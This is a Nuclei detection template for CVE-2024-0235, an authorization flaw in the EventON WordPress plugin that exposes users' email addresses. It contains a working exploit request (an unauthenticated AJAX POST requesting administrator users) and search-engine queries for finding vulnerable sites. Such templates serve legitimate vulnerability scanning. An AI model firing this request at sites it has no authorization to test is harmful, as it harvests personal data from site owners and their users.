nuclei-templates/http/cves/2024/CVE-2024-0235.yaml

59 lines
2.0 KiB
YAML

id: CVE-2024-0235
info:
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
author: princechaddha
severity: medium
description: |
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
impact: |
An attacker could potentially access sensitive email information.
remediation: |
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
reference:
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0235
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-0235
cwe-id: CWE-862
epss-score: 0.00052
epss-percentile: 0.19233
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata:
vendor: myeventon
product: eventon
framework: wordpress
shodan-query: vuln:CVE-2023-2796
fofa-query: wp-content/plugins/eventon/
publicwww-query: "/wp-content/plugins/eventon/"
google-query: inurl:"/wp-content/plugins/eventon/"
tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
headers:
Content-Type: application/x-www-form-urlencoded
body: "_user_role=administrator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '@'
- 'status":"good'
- 'value='
- '"content":'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502203776f70607308dc5842148f721807cddd437743f37d42520d8d3d7507ccb14fe0221008718d14a88f39edcfc1dc90a1b399da2330eb4d026aba06ae521a1be3ef07338:922c64590222798bb761d5b6d8e72950